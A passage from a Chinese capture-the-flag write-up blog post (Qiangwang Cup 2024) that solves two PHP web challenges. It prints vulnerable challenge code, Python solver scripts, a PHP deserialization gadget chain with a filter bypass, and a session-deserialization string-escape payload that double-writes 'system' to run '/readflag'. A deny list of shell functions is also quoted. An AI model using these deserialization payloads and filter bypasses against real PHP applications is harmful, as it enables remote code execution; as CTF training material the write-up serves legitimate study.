class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">filter</span>(<span class="hljs-params"><span class="hljs-variable">$password</span></span>)</span>&#123;<br>    <span class="hljs-variable">$filter_arr</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;admin&quot;</span>,<span class="hljs-string">&quot;2024qwb&quot;</span>);<br>    <span class="hljs-variable">$filter</span> = <span class="hljs-string">&#x27;/&#x27;</span>.<span class="hljs-title function_ invoke__">implode</span>(<span class="hljs-string">&quot;|&quot;</span>,<span class="hljs-variable">$filter_arr</span>).<span class="hljs-string">&#x27;/i&#x27;</span>;<br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-variable">$filter</span>,<span class="hljs-string">&quot;nonono&quot;</span>,<span class="hljs-variable">$password</span>);<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">guest</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$username</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$value</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__tostring</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;username==<span class="hljs-string">&quot;guest&quot;</span>)&#123;<br>            <span class="hljs-variable">$value</span>();<br>        &#125;<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;username;<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$key</span>,<span class="hljs-variable">$value</span></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;username==<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;flag&quot;</span>]))&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;flag&quot;</span>];<br>        &#125;<br>    &#125;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">root</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$username</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$value</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span>(<span class="hljs-params"><span class="hljs-variable">$key</span></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$this</span>-&gt;username, <span class="hljs-string">&quot;admin&quot;</span>) == <span class="hljs-number">0</span> &amp;&amp; <span class="hljs-variable language_">$this</span>-&gt;value == <span class="hljs-string">&quot;2024qwb&quot;</span>)&#123;<br>            <span class="hljs-variable language_">$this</span>-&gt;value = <span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;flag&quot;</span>];<br>            <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-string">&quot;hello:&quot;</span>.<span class="hljs-variable">$this</span>-&gt;value);<br>        &#125;<br>    &#125;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">user</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$username</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$password</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$value</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;username=<span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$GLOBALS</span>[<span class="hljs-string">&quot;flag&quot;</span>]);<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;password-&gt;<span class="hljs-title function_ invoke__">guess</span>();<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$this</span>-&gt;username, <span class="hljs-string">&quot;admin&quot;</span>) == <span class="hljs-number">0</span> )&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;hello&quot;</span>.<span class="hljs-variable language_">$this</span>-&gt;username;<br>        &#125;<br>    &#125;<br>&#125;<br><span class="hljs-variable">$user</span>=<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-title function_ invoke__">filter</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;password&quot;</span>]));<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$user</span>-&gt;username, <span class="hljs-string">&quot;admin&quot;</span>) == <span class="hljs-number">0</span> &amp;&amp; <span class="hljs-variable">$user</span>-&gt;password == <span class="hljs-string">&quot;2024qwb&quot;</span>)&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;hello!&quot;</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>反序列化链子在password里触发，所以还是得满足密码条件，加上序列化字符串里有数字，这里写个脚本：</p>
<p>25%左右成功率吧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> re<br><br>url = <span class="hljs-string">&quot;http://eci-2ze420okq7lsn5wjipao.cloudeci1.ichunqiu.com/&quot;</span><br>payload = <span class="hljs-string">&#x27;&#x27;&#x27;O:4:&quot;user&quot;:3:&#123;s:8:&quot;username&quot;;s:9:&quot;Infernity&quot;;s:8:&quot;password&quot;;N;s:5:&quot;value&quot;;N;&#125;&#x27;&#x27;&#x27;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check1</span>(<span class="hljs-params">number</span>):<br>    x9 = <span class="hljs-built_in">int</span>(number)//<span class="hljs-number">9</span>    <span class="hljs-comment">#多少个9</span><br>    yushu = <span class="hljs-built_in">int</span>(number)%<span class="hljs-number">9</span>  <span class="hljs-comment">#余数</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;9&quot;</span>*x9+<span class="hljs-built_in">str</span>(yushu)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check2</span>(<span class="hljs-params">number,xxbeishu,payload</span>):<br>    total = <span class="hljs-number">0</span><br>    xxbeishu = <span class="hljs-built_in">int</span>(xxbeishu)*<span class="hljs-number">5</span>     <span class="hljs-comment">#先把倍数变大，不然可能会出现负数</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(number)-<span class="hljs-number">1</span>):  <span class="hljs-comment">#遍历每一个数字加起来</span><br>        total += <span class="hljs-built_in">int</span>(number[i])<br>    temp = xxbeishu-total-check3(payload)        <span class="hljs-comment">#减去第三步需要的数字</span><br>    <span class="hljs-keyword">return</span> number+check1(temp)          <span class="hljs-comment">#把剩下不够的数字用check1来补9和余数</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check3</span>(<span class="hljs-params">payload</span>):<span class="hljs-comment">#检查payload里的数字</span><br>    numbers = re.findall(<span class="hljs-string">r&#x27;\d+&#x27;</span>, payload)<br>    total_sum = <span class="hljs-built_in">sum</span>(<span class="hljs-built_in">int</span>(num) <span class="hljs-keyword">for</span> num <span class="hljs-keyword">in</span> numbers)<br>    <span class="hljs-keyword">return</span> total_sum<br><br><br>sess = requests.Session()<br>sess.post(url+<span class="hljs-string">&quot;/index.php?action=start&quot;</span>, data=&#123;<span class="hljs-string">&quot;name&quot;</span>:<span class="hljs-string">&quot;asd&quot;</span>&#125;)<br><br>res1 = sess.post(url + <span class="hljs-string">&quot;/game.php&quot;</span>, data=&#123;<span class="hljs-string">&quot;password&quot;</span>: <span class="hljs-string">&quot;Aa132&quot;</span>&#125;) <span class="hljs-comment">#拿密码中所有数字之和必须为xx的倍数</span><br>xxbeishu = re.search(<span class="hljs-string">r&quot;密码中所有数字之和必须为(\d+)的倍数&quot;</span>, res1.text)<br>nextpass = check1(xxbeishu[<span class="hljs-number">1</span>])<br><br>res2 = sess.post(url + <span class="hljs-string">&quot;/game.php&quot;</span>, data=&#123;<span class="hljs-string">&quot;password&quot;</span>: <span class="hljs-string">&quot;Aa&quot;</span>+nextpass&#125;)<br>shuanshi = re.search(<span class="hljs-string">r&quot;(\d+)\s*([\+\-\*/])\s*(\d+)&quot;</span>, res2.text)<br><br>num1 = <span class="hljs-built_in">int</span>(shuanshi[<span class="hljs-number">1</span>])<br>fuhao = shuanshi[<span class="hljs-number">2</span>]<br>num2 = <span class="hljs-built_in">int</span>(shuanshi[<span class="hljs-number">3</span>])<br><br><span class="hljs-keyword">match</span> fuhao:<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;+&quot;</span>:<br>        result = num1+num2<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;-&quot;</span>:<br>        result = num1-num2<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;*&quot;</span>:<br>        result = num1*num2<br>    <span class="hljs-keyword">case</span> <span class="hljs-string">&quot;/&quot;</span>:<br>        result = num1//num2<br><br>nextpass = check2(<span class="hljs-built_in">str</span>(result),xxbeishu[<span class="hljs-number">1</span>],payload)<br>res3 = sess.post(url + <span class="hljs-string">&quot;/game.php&quot;</span>, data=&#123;<span class="hljs-string">&quot;password&quot;</span>: payload + <span class="hljs-string">&quot;Aa&quot;</span>+nextpass&#125;)<br><span class="hljs-built_in">print</span>(res3.text)<br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/6CE905E5C9FB20DD0B3960A6C1666DB7.png" srcset="/img/loading.gif" lazyload alt="6CE905E5C9FB20DD0B3960A6C1666DB7"></p>
<p><img src="/img/qwb2024/332750B67822FA09000338CA4130DC4E.png" srcset="/img/loading.gif" lazyload alt="332750B67822FA09000338CA4130DC4E"></p>
<p>在class root里value被赋值了flag，可以用地址引用，让user里的username取value的地址，就会自动输出flag了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">root</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$username</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$value</span>;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">user</span></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$username</span>=<span class="hljs-string">&quot;2024qwb&quot;</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$password</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$value</span>;<br>&#125;<br><br><span class="hljs-variable">$a</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">root</span>();<br><span class="hljs-variable">$a</span>-&gt;username = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">user</span>();<br><span class="hljs-variable">$a</span>-&gt;value = &amp;<span class="hljs-variable">$a</span>-&gt;username-&gt;username;      <span class="hljs-comment">//刚开始给username赋值2024qwb，同时value也是2024qwb了，所以就能进入get，然后get给value赋值为flag，username也就是flag了。</span><br><span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br><span class="hljs-variable">$b</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&quot;s:7:\&quot;2024q&quot;</span>,<span class="hljs-string">&quot;S:7:\&quot;2024\\71&quot;</span>,<span class="hljs-variable">$b</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$b</span>;<br></code></pre></td></tr></table></figure>

<p>怎么进入get呢？</p>
<p>最后这里$user-&gt;password，root类里没有password属性，就自动进入get了。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-keyword">if</span>(strpos(<span class="hljs-variable">$user</span>-&gt;username, <span class="hljs-string">&quot;admin&quot;</span>) == 0 &amp;&amp; <span class="hljs-variable">$user</span>-&gt;password == <span class="hljs-string">&quot;2024qwb&quot;</span>)&#123;<br>    <span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;hello!&quot;</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>把得到的链子填入上面的python脚本里就能拿到flag。</p>
<p><img src="/img/qwb2024/image-20241103155109815.png" srcset="/img/loading.gif" lazyload alt="image-20241103155109815"></p>
<h1 id="platform"><a href="#platform" class="headerlink" title="platform"></a>platform</h1><p><a target="_blank" rel="noopener" href="http://www.zip下载源码/">www.zip下载源码</a></p>
<p>看了一眼class.php 考点应该是session反序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php"><br><span class="hljs-keyword">private</span> <span class="hljs-variable">$sensitiveFunctions</span> = [<span class="hljs-string">&#x27;system&#x27;</span>, <span class="hljs-string">&#x27;eval&#x27;</span>, <span class="hljs-string">&#x27;exec&#x27;</span>, <span class="hljs-string">&#x27;passthru&#x27;</span>, <span class="hljs-string">&#x27;shell_exec&#x27;</span>, <span class="hljs-string">&#x27;popen&#x27;</span>, <span class="hljs-string">&#x27;proc_open&#x27;</span>];<br><span class="hljs-variable">$sessionData</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-variable">$sessionFile</span>);<br><br><span class="hljs-keyword">foreach</span> (<span class="hljs-variable language_">$this</span>-&gt;sensitiveFunctions <span class="hljs-keyword">as</span> <span class="hljs-variable">$function</span>) &#123;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">strpos</span>(<span class="hljs-variable">$sessionData</span>, <span class="hljs-variable">$function</span>) !== <span class="hljs-literal">false</span>) &#123;<br>        <span class="hljs-variable">$sessionData</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-variable">$function</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$sessionData</span>);   <span class="hljs-comment">//可以双写绕过</span><br>    &#125;<br>&#125;<br><span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$sessionFile</span>, <span class="hljs-variable">$sessionData</span>);<br></code></pre></td></tr></table></figure>

<p>利用过滤进行逃逸控制反序列化内容。字符串逃逸了。</p>
<p>举个栗子：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">username</span>=passthrupassthrupassthrupassthrupassthrupassthrupassthru<br><span class="hljs-attribute">password</span>=O:<span class="hljs-number">15</span>:<span class="hljs-string">&quot;notouchitsclass&quot;</span>:<span class="hljs-number">1</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;data&quot;</span>;s:<span class="hljs-number">10</span>:<span class="hljs-string">&quot;phpinfo();&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>如果我这样写，那么到sess里的数据会长这样：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">user</span>|s:<span class="hljs-number">56</span>:<span class="hljs-string">&quot;passthrupassthrupassthrupassthrupassthrupassthrupassthru&quot;</span>;session_key|s:<span class="hljs-number">25</span>:<span class="hljs-string">&quot;uz6IWN70l641vlzLjeixuI8CT&quot;</span>;password|s:<span class="hljs-number">56</span>:<span class="hljs-string">&quot;O:15:&quot;</span>notouchitsclass<span class="hljs-string">&quot;:1:&#123;s:4:&quot;</span>data<span class="hljs-string">&quot;;s:10:&quot;</span>phpinfo();<span class="hljs-string">&quot;;&#125;&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>经过处理之后，就变成了</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">user</span>|s:<span class="hljs-number">56</span>:<span class="hljs-string">&quot;&quot;</span>;session_key|s:<span class="hljs-number">25</span>:<span class="hljs-string">&quot;uz6IWN70l641vlzLjeixuI8CT&quot;</span>;password|s:<span class="hljs-number">56</span>:<span class="hljs-string">&quot;O:15:&quot;</span>notouchitsclass<span class="hljs-string">&quot;:1:&#123;s:4:&quot;</span>data<span class="hljs-string">&quot;;s:10:&quot;</span>phpinfo();<span class="hljs-string">&quot;;&#125;&quot;</span>;<br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/image-20241103163347648.png" srcset="/img/loading.gif" lazyload alt="image-20241103163347648"></p>
<p>如果我能让蓝色部分全部被算在user里，后面剩下的部分我就可控，可以反序列化，只需要在payload前面加;xx|</p>
<p><code>;</code>是分隔前面的数据，xx是键名随便，<code>|</code>是必要格式。</p>
<p>现在我的数据就变成了：</p>
<p><img src="/img/qwb2024/image-20241103163738734.png" srcset="/img/loading.gif" lazyload alt="image-20241103163738734"></p>
<p>session_key是随机的，我只需要多发几次包让key的长度与其他脏数据加起来等于56即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;http://eci-2zeikei7c3gbjdb3tab6.cloudeci1.ichunqiu.com&quot;</span><br><br>data = &#123;<br>    <span class="hljs-string">&quot;username&quot;</span>:<span class="hljs-string">&quot;passthrupassthrupassthrupassthrupassthrupassthrupassthru&quot;</span>,<br>    <span class="hljs-string">&quot;password&quot;</span>:<span class="hljs-string">&quot;;xx|O:15:\&quot;notouchitsclass\&quot;:1:&#123;s:4:\&quot;data\&quot;;s:20:\&quot;syssystemtem(&#x27;/readflag&#x27;);\&quot;;&#125;&quot;</span><br>&#125;         <span class="hljs-comment">#注意双写</span><br>cookies = &#123;<span class="hljs-string">&quot;PHPSESSID&quot;</span>:<span class="hljs-string">&quot;aaa&quot;</span>&#125;<br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    res = requests.post(url+<span class="hljs-string">&quot;/index.php&quot;</span>,data=data,cookies=cookies)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">&quot;flag&quot;</span> <span class="hljs-keyword">in</span> res.text:<br>        <span class="hljs-built_in">print</span>(res.text)<br>        <span class="hljs-keyword">break</span><br></code></pre></td></tr></table></figure>

<p><img src="/img/qwb2024/image-20241103164639960.png" srcset="/img/loading.gif" lazyload alt="image-20241103164639960"></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/WPs/" class="category-chain-item">WPs</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/WPs/" class="print-no-link">#WPs</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>强网杯2024</div>
      <div>http://example.com/2024/11/03/强网杯2024/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Infernity</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年11月3日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/11/09/2024%E9%B9%8F%E5%9F%8E%E6%9D%AFweb%E5%85%A8wp/" title="2024鹏城杯web全wp">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">2024鹏城杯web全wp</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/10/07/SCTF2024/" title="SCTF2024 ezRender">
                        <span class="hidden-mobile">SCTF2024 ezRender</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>





  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
